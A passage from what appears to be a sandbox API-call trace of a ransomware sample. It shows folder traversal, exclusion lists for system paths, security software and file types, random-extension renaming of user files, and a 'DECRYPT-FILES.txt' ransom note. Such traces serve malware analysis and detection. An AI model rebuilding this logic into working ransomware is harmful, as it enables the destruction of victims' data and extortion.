lpString1=0x36fd0ac, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0180.929] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0180.929] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0180.929] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0180.929] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0180.929] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0180.929] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0180.929] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0180.929] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0180.929] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0180.929] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0180.930] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0180.930] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.iKD45") returned 79 [0180.930] wsprintfW (in: param_1=0x36fdd64, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.iKD45.FNObJH") returned 86 [0180.930] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.iKD45" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic.ikd45"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.iKD45.FNObJH" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic.ikd45.fnobjh"), dwFlags=0x0) returned 1 [0180.932] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.932] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.932] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.932] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab1bc340, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab1bc340, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab1bc340, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.932] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.932] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab1bc340, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab1bc340, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab1bc340, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.932] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.932] CloseHandle (hObject=0x26c) returned 1 [0180.933] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac2fe2c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac2fe2c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0180.933] lstrcmpW (lpString1="Windows", lpString2=".") returned 1 [0180.933] lstrcmpW (lpString1="Windows", lpString2="..") returned 1 [0180.933] lstrcatW (in: lpString1="Windows", lpString2="\\" | out: lpString1="Windows\\") returned="Windows\\" [0180.933] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Windows\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\" [0180.933] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\Program Files") returned 0x0 [0180.933] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch=":\\Windows") returned 0x0 [0180.933] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\Games\\") returned 0x0 [0180.933] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.933] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.933] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.933] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.933] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.933] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\All Users") returned 0x0 [0180.933] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.933] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.933] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.933] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="AhnLab") returned 0x0 [0180.933] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.933] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\") returned 64 [0180.933] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.933] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\\\0a16c9.tmp") returned 75 [0180.933] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.934] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\") returned 64 [0180.934] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.934] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\\\DECRYPT-FILES.txt") returned 82 [0180.934] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.935] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\") returned 64 [0180.935] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\*" [0180.935] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeef77780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef77780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.935] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.935] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeef77780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef77780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.935] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.935] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.935] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeef77780, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeef77780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef77780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.935] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.935] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.935] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.936] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.936] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.936] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.936] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.936] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.936] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.936] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.936] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.936] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.936] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.936] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.936] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.936] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\") returned 64 [0180.936] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.936] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\" [0180.936] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\0a16c9.tmp" [0180.936] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.936] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.936] CloseHandle (hObject=0x0) returned 0 [0180.936] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.937] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xad8dcce0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad8dcce0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0180.937] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0180.937] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0180.937] lstrcatW (in: lpString1="Cookies", lpString2="\\" | out: lpString1="Cookies\\") returned="Cookies\\" [0180.937] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0180.937] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\Program Files") returned 0x0 [0180.937] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch=":\\Windows") returned 0x0 [0180.937] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\Games\\") returned 0x0 [0180.937] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.937] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.937] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.937] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.937] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.937] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\All Users") returned 0x0 [0180.937] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.937] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.937] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.937] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="AhnLab") returned 0x0 [0180.937] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.937] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0180.937] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.937] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\\\0a16c9.tmp") returned 83 [0180.937] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0180.938] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0180.938] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.938] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\\\DECRYPT-FILES.txt") returned 90 [0180.938] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.938] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0180.938] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*" [0180.938] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeef9d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef9d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0180.938] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.938] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeef9d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef9d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.938] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.938] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.938] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeef9d8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeef9d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef9d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.938] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.938] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.938] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.938] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.938] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.938] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.938] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.938] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.938] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.938] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.938] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.938] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.938] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.938] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.938] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.939] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0180.939] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.939] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0180.939] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\0a16c9.tmp" [0180.939] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.939] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.939] CloseHandle (hObject=0x0) returned 0 [0180.939] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.939] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1c3625f0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1c3625f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xab27aa20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x15b, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh", cAlternateFileName="5P5NRG~1.MVM")) returned 1 [0180.939] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh", lpString2="DECRYPT-FILES.txt") returned -1 [0180.939] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh", lpString2="autorun.inf") returned -1 [0180.939] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh", lpString2="boot.ini") returned -1 [0180.939] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh", lpString2="desktop.ini") returned -1 [0180.939] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh", lpString2="ntuser.dat") returned -1 [0180.939] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh", lpString2="iconcache.db") returned -1 [0180.939] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh", lpString2="bootsect.bak") 